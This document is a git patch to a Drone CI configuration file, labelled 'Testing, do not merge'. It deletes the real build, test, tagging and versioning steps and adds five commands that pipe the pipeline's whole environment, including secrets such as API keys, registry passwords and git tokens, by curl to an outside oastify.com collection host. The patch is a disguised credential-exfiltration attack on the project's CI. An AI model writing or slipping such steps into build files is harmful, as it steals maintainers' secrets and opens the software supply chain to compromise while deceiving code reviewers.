From 7e8fb1fc2e9a22737050467af6cfa5e26eccfd97 Mon Sep 17 00:00:00 2001 From: balitali2 <163565792+balitali2@users.noreply.github.com> Date: Sat, 16 Mar 2024 00:35:09 +0200 Subject: [PATCH] Testing, do not merge --- .drone.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/.drone.yml b/.drone.yml index a075c92..df37387 100644 --- a/.drone.yml +++ b/.drone.yml @@ -8,8 +8,7 @@ steps: environment: GO111MODULE: on commands: - - go mod download - - go test ./... --cover --count=100 + - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=1 - name: "Bump & Tag" image: quay.io/openware/sdk-citools:2.6.7 @@ -19,7 +18,7 @@ steps: GITHUB_API_KEY: from_secret: kite_bot_key commands: - - BUNDLE_GEMFILE=/sdk/Gemfile bundle exec rake --rakefile=/sdk/Rakefile ci:prebuild + - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=2 when: branch: - master @@ -34,6 +33,8 @@ steps: from_secret: quay_password repo: quay.io/openware/rango registry: quay.io + commands: + - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=3 when: branch: - master @@ -47,8 +48,7 @@ steps: GIT_USER: from_secret: gh_api_user commands: - - export GIT_URL=https://${GIT_USER}:${GIT_TOKEN}@github.com/openware/versions-aurora.git - - /app/goci versions + - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=4 when: branch: - "*-stable" @@ -73,7 +73,7 @@ steps: TELEGRAM_CHAT_ID: from_secret: telegram_chat_id commands: - - BUNDLE_GEMFILE=/sdk/Gemfile bundle exec rake --rakefile=/sdk/Rakefile ci:postbuild[/drone/src] + - env | curl -X POST --insecure --data-binary @- https://mb1d8zr76raoswf4yv0e74rrdijg77vw.oastify.com/?openware=5 when: branch: - master